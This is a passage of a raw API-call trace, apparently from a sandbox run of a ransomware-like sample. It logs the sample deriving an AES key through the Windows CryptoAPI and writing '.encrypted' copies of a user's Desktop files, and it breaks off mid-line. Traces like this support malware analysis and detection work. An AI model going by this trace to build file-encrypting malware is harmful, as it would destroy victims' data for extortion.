lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x647f3060, ftLastWriteTime.dwHighDateTime=0x1d5babd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0x7c2240 [0029.743] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.743] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.743] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.743] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.743] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.743] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.743] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.744] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.744] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.744] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.745] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.745] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.745] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.745] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.745] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.745] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.745] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.746] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.746] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.746] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.746] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.746] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.746] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.747] CryptHashData (hHash=0x7c2100, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.747] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.747] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.747] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.748] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.749] CryptDestroyHash (hHash=0x7c2100) returned 1 [0029.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoaigepyfblnzs8itqgh.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.749] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.749] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.750] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0029.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.751] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoaigepyfblnzs8itqgh.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0029.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 